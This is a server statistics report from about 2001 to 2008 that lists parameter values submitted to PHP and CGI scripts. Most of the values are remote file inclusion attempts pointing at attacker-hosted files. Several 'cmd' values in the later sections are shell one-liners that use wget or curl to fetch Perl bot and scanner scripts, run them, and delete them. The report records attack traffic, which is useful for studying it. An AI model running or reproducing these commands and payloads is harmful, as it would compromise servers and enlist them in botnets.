9/30/2001 to 8/27/2008: Top 100 CGI Scripts

Top 10 Parameters with Top 10 values

ScriptTotal Accesses
/Merchant2/merchant.mv 212,656
Parameters by Submitted Value
Parameter /
ValueAccesses
4
Parameter !Category_Code
ValueAccesses
EF 3
Parameter #038;Store_Code
ValueAccesses
CGTD 1
Parameter 038;Category_Code
ValueAccesses
VID01 1
Parameter 038;Product_Code
ValueAccesses
CGTDVD2004 1
Parameter Action
ValueAccesses
ADPR 96
Parameter Attributes
ValueAccesses
Yes 96
Parameter Ca!tegory_Code
ValueAccesses
EF 1
Parameter Cat!egory_Code
ValueAccesses
EF 6
Parameter Cate
ValueAccesses
3
OTHER: 212,444
ScriptTotal Accesses
//index.php 29,671
Parameters by Submitted Value
Parameter
ValueAccesses
526
Parameter DOCUMENT_ROOT
ValueAccesses
http://superspeedlearning.com/test.txt? 3
http://www.brazebo.it/test.txt? 2
http://acceicc.com/uploads/idr.txt?? 2
http://verinet.com.tr/id.txt??? 2
http://emark.sk/new/vnc/test.txt?? 2
http://fe.unnes.ac.id/v9/themes.jpg? 1
http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/d
eflate.o.LCK??
1
http://pastebin.ubuntu.com/36778/plain/? 1
http://borneo.siteburg.com/id2.txt?? 1
http://fpguild.ovh.org/phpraid/log/rid?? 1
Parameter GLOBALS
ValueAccesses
3,573
http://tanbebek.com/pitik/ascid.txt??? 1
http://pwd.roietceo.net/Newsimage/on.txt? 1
http://filicudi.t35.com/cs.txt? 1
Parameter GLOBALS[mosConfig_absolute_path]
ValueAccesses
http://www.mambembrincantes.com/site/safeon.txt?? 1
Parameter HomeDir
ValueAccesses
http://www.friendcaster.com/groups/id.txt? 3
Parameter Itemid
ValueAccesses
3
Parameter Itemid24
ValueAccesses
2
Parameter Itemid2
ValueAccesses
14
Parameter Itemid50
ValueAccesses
4
Parameter Itemid
ValueAccesses
2,064
33 20
1 14
27 14
71 14
149 10
27//index.php?_REQUEST= 7
26 7
http://www.pcr.ac.id/~rina/includes/db/alba.txt?? 6
37 5
OTHER: 23,365
ScriptTotal Accesses
/wusage2/summary/cgi.html//index.php 28,771
Parameters by Submitted Value
Parameter
ValueAccesses
342
Parameter DOCUMENT_ROOT
ValueAccesses
http://acceicc.com/uploads/idr.txt?? 2
http://verinet.com.tr/id.txt??? 1
http://borneo.siteburg.com/id2.txt?? 1
Parameter GLOBALS
ValueAccesses
4,247
http://filicudi.t35.com/cs.txt? 1
http://www.majorna414.com/gb2.dat? 1
Parameter GLOBALS[mosConfig_absolute_path]
ValueAccesses
? 1
http://www.mambembrincantes.com/site/safeoff.txt?? 1
http://www.mambembrincantes.com/site/safeon.txt?? 1
Parameter HomeDir
ValueAccesses
http://www.friendcaster.com/groups/id.txt? 3
Parameter Itemid
ValueAccesses
1
Parameter Itemid24
ValueAccesses
1
Parameter Itemid2
ValueAccesses
1
Parameter Itemid50
ValueAccesses
3
Parameter Itemid
ValueAccesses
1,060
33 17
1 11
181/index.php?_REQUEST= 6
55〈=fr/index.php?_REQUEST= 6
149 5
9 5
37 4
55 4
191//administrator/configuration.php?option=com_login 4
OTHER: 23,042
ScriptTotal Accesses
/index.php 25,747
Parameters by Submitted Value
Parameter /////////?mosConfig_absolute_path
ValueAccesses
http://rafb.net/p/fZZpha10.txt? 1
Parameter /
ValueAccesses
10
Parameter /?mosConfig_absolute_path
ValueAccesses
"joomla"http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.
txt??
1
http://www.dito.nl/php_content/.htaccess_/test.txt?? 1
Parameter /addons/guildbank/searcharrays.php?addonDir
ValueAccesses
/guildbank/http://aceperform.890m.com/test.txt? 1
Parameter /components/com_extcalendar/admin_events.php?
ValueAccesses
1
Parameter /components/com_facileforms/facileforms.frame.php?ff_compath
ValueAccesses
http://ultradesign.ru/phpBB2/files/id.txt?? 1
Parameter /main.php?appserv_root
ValueAccesses
"appserv"http://190.8.128.58/.../test.txt?? 1
Parameter /skin/zero_vote/ask_password.php?dir
ValueAccesses
"zeroboard" net "zeroboard" ukhttp://h1.ripway.com/ulandary
/testing.txt?
2
Parameter /tools/send_reminders.php?noSet
ValueAccesses
0 2
Parameter
ValueAccesses
22
http://190.8.128.58/.../test.txt?? 4
http://www.geocities.com/ntchack/test.txt?? 3
http://www.geocities.com/whillyz_cool/on.txt?? 2
errorhttp://h1.ripway.com/cyber1212/plugin/id.txt??? 1
errorhttp://xdedzx.com/xdedzx/id.txt??? 1
PHPE9568F35-D428-11d2-A769-00AA001ACF42 1
connection:absolute_path=http://usuarios.arnet.com.ar/larry1
23/safe.txt?
1
http://www.ttfs.de/FAQ/attachments/echo.txt? 1
PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 1
OTHER: 25,689
ScriptTotal Accesses
/wusage/summary/cgi.html//index.php 21,974
Parameters by Submitted Value
432
http://politics.wwf.gr/help/css/faq.txt?? 1
Parameter DOCUMENT_ROOT
ValueAccesses
http://verinet.com.tr/id.txt??? 2
http://borneo.siteburg.com/id2.txt?? 1
Parameter Forum
ValueAccesses
NUKE 1
Parameter GLOBALS
ValueAccesses
2,832
http://tanbebek.com/pitik/ascid.txt??? 1
Parameter GLOBALS[mosConfig_absolute_path]
ValueAccesses
http://www.mambembrincantes.com/site/safeon.txt?? 1
Parameter HomeDir
ValueAccesses
http://www.friendcaster.com/groups/id.txt? 3
Parameter Itemid24
ValueAccesses
1
Parameter Itemid2
ValueAccesses
5
Parameter Itemid50
ValueAccesses
4
Parameter Itemid
ValueAccesses
1,278
71 28
33 16
1 9
27 7
26 4
181/index.php?_REQUEST= 4
37 4
191//administrator/configuration.php?option=com_expose 4
9 3
Parameter PHPSESSID
ValueAccesses
3fce7c65314a8b8c3e4924ccd2a87f01//redaxo/include/addons/imag
e_resize/pages/index.inc.php?subpage=relations
1
OTHER: 17,332
ScriptTotal Accesses
/wusage2/summary//index.php 17,327
Parameters by Submitted Value
Parameter
ValueAccesses
257
Parameter DOCUMENT_ROOT
ValueAccesses
http://superspeedlearning.com/test.txt? 3
http://www.brazebo.it/test.txt? 2
http://acceicc.com/uploads/idr.txt?? 2
http://emark.sk/new/vnc/test.txt?? 1
http://fpguild.ovh.org/phpraid/log/rid?? 1
http://borneo.siteburg.com/id2.txt?? 1
http://verinet.com.tr/id.txt??? 1
http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/
nfo.txt?
1
http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/d
eflate.o.LCK??
1
Parameter GLOBALS
ValueAccesses
2,227
http://filicudi.t35.com/cs.txt? 1
Parameter GLOBALS[mosConfig_absolute_path]
ValueAccesses
http://www.mambembrincantes.com/site/safeon.txt?? 1
Parameter HomeDir
ValueAccesses
http://www.friendcaster.com/groups/id.txt? 3
Parameter Itemid
ValueAccesses
2
Parameter Itemid24
ValueAccesses
1
Parameter Itemid2
ValueAccesses
5
Parameter Itemid50
ValueAccesses
3
Parameter Itemid
ValueAccesses
1,022
33 19
1 9
149 7
9 5
35 4
37 4
55 4
27 4
181/index.php?_REQUEST= 3
OTHER: 13,733
ScriptTotal Accesses
/wusage2/summary/cgi.html/index.php 15,617
Parameters by Submitted Value
Parameter
ValueAccesses
10
errorhttp://xdedzx.com/xdedzx/id.txt??? 1
connection:absolute_path=http://usuarios.arnet.com.ar/larry1
23/safe.txt?
1
http://aliaa.t35.com/ailer.txt?V 1
errorhttp://h1.ripway.com/cyber1212/plugin/id.txt??? 1
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://stmikx.freehoxt.com/Sekip/id.txt?? 2
http://www.bes.org.tr/imgcls/cmd2.txt????? 2
http://stmikx.freehoxt.com/Sekip/s.txt?? 1
Parameter DOCUMENT_ROOT
ValueAccesses
http://acceicc.com/uploads/idr.txt?? 2
http://wtv.mathiaskarge.de//marthabotid.txt?? 1
http://spiritualcultivation.com/modules/idar.txt?? 1
http://spiritualcultivation.com/modules/idxx.txt????? 1
http://spiritualcultivation.com/modules/idr.txt?? 1
Parameter FORM[aid]
ValueAccesses
61 1
Parameter GLOBALS
ValueAccesses
830
Parameter HomeDir
ValueAccesses
http://darkisx.com/plugins/xoops/2fast.txt? 1
Parameter Itemid
ValueAccesses
1,905
http://mosaictoronto.org/help/indexs.php? 47
1 21
http://www.arthog.co.uk/login/pi.txt? 15
http://www.autogas-dortmund.de/index.txt? 9
71/index.php?_REQUEST= 7
S@BUN 6
http://politics.wwf.gr/help/css/faq.txt? 6
s@bun 6
http://babbfamilyalbum.com/modules/Forums/admin/robots.txt??
?
4
Parameter PHPSESSID
ValueAccesses
http://lizartdisplay.com/di?? 1
Parameter RP_PATH
ValueAccesses
http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? 2
http://www.spindl-hotelpraha.cz/system/temp/control.txt? 2
Parameter _REQUEST
ValueAccesses
834
http://hamapallen.us/fadalinux.txt? 37
http://usuarios.arnet.com.ar/adrikrasnow/test.txt? 29
http://www.informaretreinamento.com.br/old_stats/old/php5/ra
pidget/users/x.txt???
25
http://www.korna.org/lamer.txt?? 21
http://www.freewebtown.com/suamae123/suamae.txt? 18
http://usuarios.arnet.com.ar/adrikrasnow/jo.txt? 18
http://normanzito.iespana.es/http.txt?? 17
http://www.freewebtown.com/c4sh123456/jo.txt? 16
http://tutoriaisclube.com/imagens/safeon??????? 14
OTHER: 11,700
ScriptTotal Accesses
/wusage/summary//index.php 14,601
Parameters by Submitted Value
Parameter
ValueAccesses
287
Parameter DOCUMENT_ROOT
ValueAccesses
http://superspeedlearning.com/test.txt? 3
http://verinet.com.tr/id.txt??? 2
http://emark.sk/new/vnc/test.txt?? 2
http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/
nfo.txt?
1
http://www.rajacademy.com/shop/blocks/test.txt?? 1
http://www.brazebo.it/test.txt? 1
http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/d
eflate.o.LCK??
1
http://borneo.siteburg.com/id2.txt?? 1
http://fpguild.ovh.org/phpraid/log/rid?? 1
Parameter GLOBALS
ValueAccesses
1,724
http://tanbebek.com/pitik/ascid.txt??? 1
Parameter GLOBALS[mosConfig_absolute_path]
ValueAccesses
http://www.mambembrincantes.com/site/safeon.txt?? 1
Parameter HomeDir
ValueAccesses
http://www.friendcaster.com/groups/id.txt? 3
Parameter Itemid
ValueAccesses
1
Parameter Itemid24
ValueAccesses
2
Parameter Itemid2
ValueAccesses
7
Parameter Itemid50
ValueAccesses
4
Parameter Itemid
ValueAccesses
1,125
33 19
71 14
1 9
27 5
149 5
26 4
9 4
35 4
27//index.php?_REQUEST= 4
OTHER: 11,365
ScriptTotal Accesses
/wusage2/summary/index.php 13,563
Parameters by Submitted Value
Parameter /?mosConfig_absolute_path
ValueAccesses
"joomla"http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.
txt??
1
http://www.dito.nl/php_content/.htaccess_/test.txt?? 1
Parameter /addons/guildbank/searcharrays.php?addonDir
ValueAccesses
/guildbank/http://aceperform.890m.com/test.txt? 1
Parameter /main.php?appserv_root
ValueAccesses
"appserv"http://190.8.128.58/.../test.txt?? 1
Parameter /skin/zero_vote/ask_password.php?dir
ValueAccesses
"zeroboard" net "zeroboard" ukhttp://h1.ripway.com/ulandary
/testing.txt?
1
Parameter
ValueAccesses
15
Parameter lugin/test.txt?"> "com_shambo2"http://johnkaragiannis.gr/cms//components/com_p
lugin/test.txt?
ValueAccesses
1
Parameter
ValueAccesses
http://190.8.128.58/.../test.txt?? 4
http://www.geocities.com/ntchack/test.txt?? 3
errorhttp://xdedzx.com/xdedzx/id.txt??? 1
http://www.geocities.com/whillyz_cool/on.txt?? 1
connection:absolute_path=http://usuarios.arnet.com.ar/larry1
23/safe.txt?
1
errorhttp://h1.ripway.com/cyber1212/plugin/id.txt??? 1
Parameter ?mosConfig_absolute_path
ValueAccesses
http://www.fidanquetravel.com/images/stats.txt?? 1
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://www.bes.org.tr/imgcls/cmd2.txt????? 1
http://stmikx.freehoxt.com/Sekip/id.txt?? 1
Parameter DOCUMENT_ROOT
ValueAccesses
http://acceicc.com/uploads/idr.txt?? 2
http://legalref.ru/config/idscan.txt? 1
http://wtv.mathiaskarge.de//marthabotid.txt?? 1
http://spiritualcultivation.com/modules/idar.txt?? 1
http://spiritualcultivation.com/modules/idxx.txt????? 1
http://spiritualcultivation.com/modules/idr.txt?? 1
OTHER: 13,521
ScriptTotal Accesses
/wusage/summary/cgi.html/index.php 13,285
Parameters by Submitted Value
Parameter
ValueAccesses
17
connection:absolute_path=http://usuarios.arnet.com.ar/larry1
23/safe.txt?
1
errorhttp://xdedzx.com/xdedzx/id.txt??? 1
connection:absolute_path=http://www.kinkware.com/shop/pub/er
ror.txt??
1
errorhttp://h1.ripway.com/cyber1212/plugin/id.txt??? 1
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://www.bes.org.tr/imgcls/cmd2.txt????? 2
Parameter DOCUMENT_ROOT
ValueAccesses
http://acceicc.com/uploads/idr.txt?? 2
http://wtv.mathiaskarge.de//marthabotid.txt?? 1
http://spiritualcultivation.com/modules/idxx.txt????? 1
http://spiritualcultivation.com/modules/idar.txt?? 1
Parameter FORM[aid]
ValueAccesses
61 1
Parameter GALLERY_BASEDIR
ValueAccesses
http://www.bes.org.tr/imgcls/cmd2.txt????? 4
Parameter GLOBALS
ValueAccesses
798
Parameter HomeDir
ValueAccesses
http://darkisx.com/plugins/xoops/2fast.txt? 1
Parameter IMAGE
ValueAccesses
http://h1317070.stratoserver.net/cmd/scheck.txt? 3
http://geocities.com/webmastersmansa/ryuk.txt?? 2
http://solvitron.com/modules/NukeC30/imagecatg/tobox.txt? 2
http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?
?
2
http://www.viaconjur.com.br/manual_arquivos/y.txt? 2
http://h1317070.stratoserver.net/cmd/cmdskan.txt? 2
http://geocities.com/hammed_4000/hammmed.txt? 2
http://www.hardstam.se/talkforum/cache/skin_cache/cacheid_2/
123.txt?
2
http://www.cypcaribbean.org/cyp/phpBB/images/smiles/bypass2.
txt??
1
http://geocities.com/golden.baba/Xtreme.txt? 1
Parameter Itemid
ValueAccesses
1,639
http://www.freewebtown.com/laznet/xdx.txt? 27
http://60z.org/l.txt? 26
1 24
s@bun 9
http://league.totalgamingnetwork.com/tgl_client/uploads/etqw
contest/newfish.txt??
8
71/index.php?_REQUEST= 7
http://league.totalgamingnetwork.com/tgl_client/uploads/etqw
contest/sh.txt?
5
http://h1.ripway.com/snacks/id.txt?? 4
http://60z.org/l1.txt? 3
Parameter PHPSESSID
ValueAccesses
http://lizartdisplay.com/di?? 1
OTHER: 10,681
ScriptTotal Accesses
/wusage/summary/index.php 12,100
Parameters by Submitted Value
Parameter /////////?mosConfig_absolute_path
ValueAccesses
http://rafb.net/p/fZZpha10.txt? 1
Parameter /?mosConfig_absolute_path
ValueAccesses
"joomla"http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.
txt??
1
http://www.dito.nl/php_content/.htaccess_/test.txt?? 1
Parameter /addons/guildbank/searcharrays.php?addonDir
ValueAccesses
/guildbank/http://aceperform.890m.com/test.txt? 1
Parameter /skin/zero_vote/ask_password.php?dir
ValueAccesses
"zeroboard" net "zeroboard" ukhttp://h1.ripway.com/ulandary
/testing.txt?
1
Parameter /tools/send_reminders.php?noSet
ValueAccesses
0 2
Parameter
ValueAccesses
15
http://www.geocities.com/ntchack/test.txt?? 2
connection:absolute_path=http://usuarios.arnet.com.ar/larry1
23/safe.txt?
1
connection:absolute_path=http://www.kinkware.com/shop/pub/er
ror.txt??
1
errorhttp://xdedzx.com/xdedzx/id.txt??? 1
http://www.geocities.com/whillyz_cool/on.txt?? 1
errorhttp://h1.ripway.com/cyber1212/plugin/id.txt??? 1
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://www.bes.org.tr/imgcls/cmd2.txt????? 1
Parameter DOCUMENT_ROOT
ValueAccesses
http://acceicc.com/uploads/idr.txt?? 2
http://wtv.mathiaskarge.de//marthabotid.txt?? 1
http://legalref.ru/config/idscan.txt? 1
http://spiritualcultivation.com/modules/idar.txt?? 1
http://spiritualcultivation.com/modules/idxx.txt????? 1
Parameter FORM[aid]
ValueAccesses
61 1
Parameter GALLERY_BASEDIR
ValueAccesses
http://www.bes.org.tr/imgcls/cmd2.txt????? 2
http://csinfo.pl/includes/union/test.txt?? 1
OTHER: 12,060
ScriptTotal Accesses
/cgi-bin/edit/admin/diary.cgi 10,497
Parameters by Submitted Value
Parameter
ValueAccesses
1,082
Parameter action
ValueAccesses
edit 847
build 566
make 369
update 34
Parameter artist
ValueAccesses
Bert_Lams 2,786
Paul_Richards 556
Parameter button
ValueAccesses
Delete 34
Parameter email
ValueAccesses
y 3,342
Parameter item
ValueAccesses
1 812
2 60
3 5
5 2
4 1
7 1
OTHER: 0
ScriptTotal Accesses
/wusage2/summary/cgi.html//components/com_facileforms/facile
forms.frame.php
7,934
Parameters by Submitted Value
Parameter
ValueAccesses
22
Parameter ?ff_compath
ValueAccesses
http://60z.org/wut.txt? 3
Parameter bot
ValueAccesses
1\r 2
Parameter cmd ??
ValueAccesses
1
Parameter cmd
ValueAccesses
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://201.70.9.109/ip1.txt;wget http://201.70.9.109/ros1.txt
;wget http://201.70.9.109/scanasc.txt;curl -o ip1.txt http:/
/201.70.9.109/ip1.txt;curl -o ros1.txt http://201.70.9.109/r
os1.txt;curl -o scanasc.txt http://201.70.9.109/scanasc.txt;
perl ip1.txt;perl ros1.txt;perl scanasc.txt
70
cd /tmp;rm temp.txt;wget http://pemlk.iespana.es/tools/temp.
txt;fetch http://pemlk.iespana.es/tools/temp.txt;lwp-downloa
d http://pemlk.iespana.es/tools/temp.txt;curl -O http://peml
k.iespana.es/tools/temp.txt;lynx http://pemlk.iespana.es/too
ls/temp.txt;perl temp.txt;rm temp.txt?
13
id 8
killall -9 perl;rm new.txt;rm ip1.txt;rm ros1.txt;rm scanasc
.txt;wget http://189.14.98.102/new.txt;wget http://189.14.98
.102/ip1.txt;wget http://189.14.98.102/ros1.txt;wget http://
189.14.98.102/scanasc.txt;curl -o new.txt http://189.14.98.1
02/new.txt;curl -o ip1.txt http://189.14.98.102/ip1.txt;curl
-o ros1.txt http://189.14.98.102/ros1.txt;curl -o scanasc.t
xt http://189.14.98.102/scanasc.txt;perl new.txt;perl ip1.tx
t;perl ros1.txt;perl scanasc.txt
8
cd /tmp;GET http://www.brx.kit.net/bruxom4l.txt > bruxom4l.t
xt;perl bruxom4l.txt abcase
6
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.pag.it/images/ip1.txt;wget http://www.pag.it/image
s/ros1.txt;wget http://www.pag.it/images/scanasc.txt;curl -o
ip1.txt http://www.pag.it/images/ip1.txt;curl -o ros1.txt h
ttp://www.pag.it/images/ros1.txt;curl -o scanasc.txt http://
www.pag.it/images/scanasc.txt;perl ip1.txt;perl ros1.txt;per
l scanasc.txt
6
killall -9 perl;rm spriter1.txt;wget http://www.pag.it/image
s/spriter1.txt;curl -o spriter1.txt http://www.pag.it/images
/spriter1.txt;perl spriter1.txt;perl spriter1.txt;perl sprit
er1.txt;perl spriter1.txt;perl spriter1.txt;perl spriter1.tx
t
5
cd /tmp;id 4
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.kcdesi.com/ip1.txt;wget http://www.kcdesi.com/ros1
.txt;wget http://www.kcdesi.com/scanasc.txt;curl -o ip1.txt
http://www.kcdesi.com/ip1.txt;curl -o ros1.txt http://www.kc
desi.com/ros1.txt;curl -o scanasc.txt http://www.kcdesi.com/
scanasc.txt;perl ip1.txt;perl ros1.txt;perl scanasc.txt
3
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
3
Parameter ff_compath
ValueAccesses
http://mosaictoronto.org/help/indexs.php? 264
http://www.xsenhalol.xpg.com.br/ylaslas?\r 146
http://alvinlol.angelfire.com/Shells_in_php.txt? 123
http://www.urjb.com/photos/albums/userpics/10001/thumb_blank
.gif??
108
http://zenyth.angelfire.com/xbot.txt? 96
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima
ges/.asc/www?????????????????????????????
88
http://60z.org/l.txt? 79
http://xxxds.110mb.com/conf.txt???? 77
http://201.70.9.109/cmd.txt? 72
http://www.dunakom.hu/userimages/id.txt? 70
Parameter ff_compathftp://128.175.10.3/incoming/smile01.jpg??
ValueAccesses
1
Parameter ff_compathftp://128.175.10.3/incoming/smile04.jpg?
ValueAccesses
1
Parameter ff_compathhttp://kiliclub.com/tmp/mini.htm?
ValueAccesses
1
Parameter mosConfig_absolute_path
ValueAccesses
http://test.iearn.uz/test.iearn.uz/help.txt??? 6
http://www.infuse.be/v2//cache/id.txt?? 2
http://12.30.229.109/images/.../di?? 2
http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt
??
2
http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? 1
http://xucx.co.cc/gen/mix.txt??? 1
http://yudz-yudz.110mb.com/safe.txt? 1
http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? 1
http://avvv.altervista.org/scantxt.txt? 1
http://www.hotelsunflower.it/modules/rhs/idv6.txt??? 1
OTHER: 6,636
ScriptTotal Accesses
/wusage2/summary/cgi.html//administrator/components/com_uhp/
uhp_config.php
6,184
Parameters by Submitted Value
Parameter
ValueAccesses
1
Parameter cmd
ValueAccesses
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://201.70.9.109/ip1.txt;wget http://201.70.9.109/ros1.txt
;wget http://201.70.9.109/scanasc.txt;curl -o ip1.txt http:/
/201.70.9.109/ip1.txt;curl -o ros1.txt http://201.70.9.109/r
os1.txt;curl -o scanasc.txt http://201.70.9.109/scanasc.txt;
perl ip1.txt;perl ros1.txt;perl scanasc.txt
21
id 13
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.pag.it/images/ip1.txt;wget http://www.pag.it/image
s/ros1.txt;wget http://www.pag.it/images/scanasc.txt;curl -o
ip1.txt http://www.pag.it/images/ip1.txt;curl -o ros1.txt h
ttp://www.pag.it/images/ros1.txt;curl -o scanasc.txt http://
www.pag.it/images/scanasc.txt;perl ip1.txt;perl ros1.txt;per
l scanasc.txt
6
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt
6
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
5
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
5
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;rm spr
iter1.txt;wget http://www.kcdesi.com/spriter1.txt;curl -o sp
riter1.txt http://www.kcdesi.com/spriter1.txt;perl spriter1.
txt
5
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3
.ru/SCANRFI2.txt > SCANRFI2.txt;perl SCANRFI2.txt;rm SCANRFI
2.txt
4
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3.
ru/rootscan.txt > rootscan.txt;perl rootscan.txt;rm rootscan
.txt
3
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.kcdesi.com/ip1.txt;wget http://www.kcdesi.com/ros1
.txt;wget http://www.kcdesi.com/scanasc.txt;curl -o ip1.txt
http://www.kcdesi.com/ip1.txt;curl -o ros1.txt http://www.kc
desi.com/ros1.txt;curl -o scanasc.txt http://www.kcdesi.com/
scanasc.txt;perl ip1.txt;perl ros1.txt;perl scanasc.txt
3
Parameter includedir
ValueAccesses
http://www.archfuck.ru/administrator/components/com_remosito
ry/zell.txt??
1
Parameter mosConfig_absolute_path
ValueAccesses
http://mosaictoronto.org/help/indexs.php? 754
http://www.mosaictoronto.org/help/indexs.php? 469
http://www.shakershoppe.com/_files/x.txt?? 432
http://www.autogas-dortmund.de/index.txt? 216
http://www.xsenhalol.xpg.com.br/ylaslas?\r 88
http://arabiclawyers.us/.,/.phpirc??? 76
http://janolek.republika.pl/zz..txt?? 64
http://60z.org/phpbot.txt? 47
http://usuarios.arnet.com.ar/adrikrasnow/test.txt? 45
http://www.cdpm3.com/id.txt? 43
OTHER: 3,877
ScriptTotal Accesses
// 6,011
Parameters by Submitted Value
Parameter
ValueAccesses
1
Parameter CONFIG_EXT[ADMIN_PATH]
ValueAccesses
http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? 3
http://220.134.235.165/modules/xoopsgallery/cache/albums/...
./o??
1
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://dannaoui.com/Mambo/images/img/paddy?? 4
http://www.airmatrix.net/components/com_joomlalib/standalone
/id.txt?
2
http://trimedia-online.net/ihmank/id.txt??? 1
Parameter CONFIG_EXT[LIB_DIR]
ValueAccesses
http://claroline.lct-net.cl/id??? 1
http://www.mta.cl/galeria2/galery.txt??? 1
http://www.mta.cl/galeria2/galery.txt? 1
Parameter GALLERY_BASEDIR
ValueAccesses
http://arf.org.uk/media/test.txt??? 1
Parameter GLOBALS
ValueAccesses
42
Parameter Itemid
ValueAccesses
10
38 1
Parameter REX[INCLUDE_PATH]
ValueAccesses
http://pediatric-neurology-paris.net/media/install_41aca995b
9171/patch/includes/vsc/botid.txt?
10
http://www.hausvertriebspartner.de/rfi-response.txt?? 1
Parameter STPHPLIB_DIR
ValueAccesses
http://www.rostop.com/zerocool/id.txt??? 2
Parameter _CONFIG[files][functions_page]
ValueAccesses
http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs
/test.txt???
1
OTHER: 5,928
ScriptTotal Accesses
/wusage/summary/cgi.html//components/com_facileforms/facilef
orms.frame.php
5,794
Parameters by Submitted Value
Parameter
ValueAccesses
24
Parameter ?ff_compath
ValueAccesses
http://60z.org/wut.txt? 2
Parameter cmd ??
ValueAccesses
1
Parameter cmd
ValueAccesses
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://201.70.9.109/ip1.txt;wget http://201.70.9.109/ros1.txt
;wget http://201.70.9.109/scanasc.txt;curl -o ip1.txt http:/
/201.70.9.109/ip1.txt;curl -o ros1.txt http://201.70.9.109/r
os1.txt;curl -o scanasc.txt http://201.70.9.109/scanasc.txt;
perl ip1.txt;perl ros1.txt;perl scanasc.txt
35
id 16
cd /tmp;rm temp.txt;wget http://pemlk.iespana.es/tools/temp.
txt;fetch http://pemlk.iespana.es/tools/temp.txt;lwp-downloa
d http://pemlk.iespana.es/tools/temp.txt;curl -O http://peml
k.iespana.es/tools/temp.txt;lynx http://pemlk.iespana.es/too
ls/temp.txt;perl temp.txt;rm temp.txt?
12
uname -a; id 10
killall -9 perl;rm new.txt;rm ip1.txt;rm ros1.txt;rm scanasc
.txt;wget http://189.14.98.102/new.txt;wget http://189.14.98
.102/ip1.txt;wget http://189.14.98.102/ros1.txt;wget http://
189.14.98.102/scanasc.txt;curl -o new.txt http://189.14.98.1
02/new.txt;curl -o ip1.txt http://189.14.98.102/ip1.txt;curl
-o ros1.txt http://189.14.98.102/ros1.txt;curl -o scanasc.t
xt http://189.14.98.102/scanasc.txt;perl new.txt;perl ip1.tx
t;perl ros1.txt;perl scanasc.txt
4
id???? 2
id;wget www.grupaw.pl/d.pl -O /tmp/d.jpg;perl /tmp/d.jpg;rm
-rf /tmp/d.jpg
2
cd /tmp;wget www.grupaw.pl/d.jpg;perl d.jpg;rm -rf d.jpg;htt
p://beusix.net/cmd.gif?
1
uhttp://usuarios.arnet.com.ar/adrikrasnow/jo.txt?name -a; id
1
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://201.70.9.109/ip
1
Parameter ff_compath
ValueAccesses
http://xxxds.110mb.com/conf.txt???? 126
http://www.urjb.com/photos/albums/userpics/10001/thumb_blank
.gif??
106
http://www.dunakom.hu/userimages/id.txt? 98
http://www.xsenhalol.xpg.com.br/ylaslas?\r 92
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima
ges/.asc/www?????????????????????????????
81
http://mosaictoronto.org/help/indexs.php????) 57
http://www.superlab.jazztel.es/safe.gif? 47
http://64.22.125.219/r0x/id.txt??? 43
http://radio.cp-geek.com/c.txt?\r 40
